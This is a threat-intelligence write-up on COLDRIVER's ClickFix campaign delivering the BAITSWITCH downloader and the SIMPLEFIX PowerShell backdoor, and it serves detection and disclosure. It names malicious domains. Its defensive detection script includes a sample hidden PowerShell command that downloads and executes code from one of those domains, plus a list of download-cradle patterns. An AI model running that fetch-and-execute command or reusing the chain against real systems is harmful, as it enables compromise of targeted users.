SIMPLEFIX Malware

The Russian advanced persistent threat (APT) group COLDRIVER has been linked to a new wave of ClickFix-style attacks, introducing two lightweight malware families: BAITSWITCH and SIMPLEFIX. Security researchers identified this multi-stage campaign in September 2025. BAITSWITCH acts as a downloader that ultimately delivers SIMPLEFIX, a PowerShell-based backdoor.

COLDRIVER, also known by aliases such as Callisto, Star Blizzard, and UNC4057, has been active since 2019, targeting a broad spectrum of organizations. Early campaigns relied on spear-phishing to redirect victims to credential-harvesting pages. Over time, the group has developed custom tools like SPICA and LOSTKEYS, highlighting its growing technical sophistication.

ClickFix: A Proven, Persistent Attack Vector

This APT group has previously deployed ClickFix tactics, first documented in May 2025. In those campaigns, fake websites offered fraudulent CAPTCHA prompts, tricking victims into executing PowerShell commands that delivered the LOSTKEYS Visual Basic Script.

While ClickFix is neither novel nor highly advanced, its repeated use demonstrates its effectiveness as an infection vector. The latest attacks maintain the same general methodology: victims are deceived into running a malicious DLL through the Windows Run dialog, ostensibly to complete a CAPTCHA check.

Anatomy of the Attack Chain

The attack proceeds as follows:

The BAITSWITCH DLL is executed and connects to an attacker-controlled domain (captchanom.top) to fetch the SIMPLEFIX backdoor. A decoy document hosted on Google Drive is displayed to distract the victim.

Several HTTP requests are sent to the same server to transmit system information, receive commands for persistence, store encrypted payloads in the Windows Registry, download a PowerShell stager, and erase recent Run dialog history to cover traces.

The PowerShell stager downloads SIMPLEFIX from southprovesolutions.com. SIMPLEFIX establishes a connection with a Command-and-Control (C2) server, enabling execution of remote PowerShell scripts, commands, and binaries.

A PowerShell script executed via SIMPLEFIX targets a predefined set of directories and file types for exfiltration, a collection pattern that overlaps with previous LOSTKEYS campaigns.
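As a defender-side illustration of the chain described above, the following is an added example (not code from the report or its researchers) that correlates constructed Sysmon-style endpoint events into a single alert when several stages of the chain appear on one host inside a short window. Only the two domains, captchanom.top and southprovesolutions.com, come from the write-up; the event format, the sample log lines, the assumption that a DLL launched from the Run dialog appears as rundll32.exe with explorer.exe as its parent, the RunMRU key as the location of Run dialog history, and the registry value size threshold are all assumptions made for this example.

```python
"""Correlate constructed endpoint events into a ClickFix -> BAITSWITCH -> SIMPLEFIX
chain alert. Sample events are constructed; only the two domains come from the report."""
from datetime import datetime, timedelta

# Indicators named in the report.
KNOWN_DOMAINS = {"captchanom.top", "southprovesolutions.com"}
# Windows keeps Run dialog history under this key (Windows fact; the report only
# says the history is erased).
RUN_MRU_KEY = r"software\microsoft\windows\currentversion\explorer\runmru"
# Common PowerShell download primitives to look for in a stager command line.
DOWNLOAD_CRADLES = ("downloadstring", "invoke-webrequest", "iwr ", "net.webclient")
# Assumption: payload blobs written to the registry are far larger than normal values.
REGISTRY_BLOB_MIN = 256

# Constructed sample telemetry with simplified Sysmon-like field names (not real logs).
SAMPLE_EVENTS = [
    {"ts": "2025-09-20T10:00:00", "host": "ws01", "type": "process",
     "image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"rundll32.exe C:\Users\u\Downloads\check.dll,Run"},
    {"ts": "2025-09-20T10:00:05", "host": "ws01", "type": "network",
     "image": r"C:\Windows\System32\rundll32.exe", "dest": "captchanom.top"},
    {"ts": "2025-09-20T10:00:30", "host": "ws01", "type": "registry", "action": "SetValue",
     "target": r"HKCU\Software\AppData\Cache\blob", "details": "A" * 4096},
    {"ts": "2025-09-20T10:00:40", "host": "ws01", "type": "registry", "action": "DeleteValue",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"},
    {"ts": "2025-09-20T10:01:00", "host": "ws01", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmd": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
            ".DownloadString('https://southprovesolutions.com/')\""},
    # Benign noise on another host: an administrator running rundll32 from a console.
    {"ts": "2025-09-20T10:02:00", "host": "ws02", "type": "process",
     "image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def classify(ev):
    """Map one event to a chain stage name, or None if it is not interesting."""
    image = ev.get("image", "").lower()
    cmd = ev.get("cmd", "").lower()
    if ev["type"] == "process":
        # Assumption: a DLL run from the Run dialog shows as explorer.exe -> rundll32.exe.
        if image.endswith("rundll32.exe") and ev.get("parent", "").lower().endswith("explorer.exe"):
            return "dll_via_run_dialog"
        if image.endswith("powershell.exe") and any(c in cmd for c in DOWNLOAD_CRADLES):
            return "powershell_stager"
    elif ev["type"] == "network":
        if ev.get("dest", "").lower() in KNOWN_DOMAINS:
            return "known_c2_domain"
    elif ev["type"] == "registry":
        target = ev.get("target", "").lower()
        if ev.get("action") in ("DeleteValue", "DeleteKey") and RUN_MRU_KEY in target:
            return "runmru_history_cleared"
        if ev.get("action") == "SetValue" and len(ev.get("details", "")) >= REGISTRY_BLOB_MIN:
            return "registry_payload_blob"
    return None


def correlate(events, window=timedelta(minutes=30), min_stages=3):
    """Group tagged events per host and alert when at least min_stages distinct
    stages fall inside one time window. Returns {host: sorted list of stages}."""
    by_host = {}
    for ev in events:
        stage = classify(ev)
        if stage:
            by_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), stage))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            stages = {s for t, s in hits[i:] if t - start <= window}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```

Requiring several distinct stages within a window, rather than alerting on any one of them, is what keeps the noise down: a lone rundll32 launch or a single large registry write is common on a healthy fleet, while the combination of Run dialog execution, a known domain, a registry blob, cleared Run history and a PowerShell download cradle on the same host within minutes is not.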

Target Profile and Strategic Focus

COLDRIVER’s operations primarily focus on civil society actors, including:

  • Members of NGOs and think tanks in Western regions
  • Human rights defenders
  • Individuals exiled from or residing in Russia

The current campaign aligns closely with this established victimology, reinforcing the group’s ongoing interest in Russian civil society and related networks.
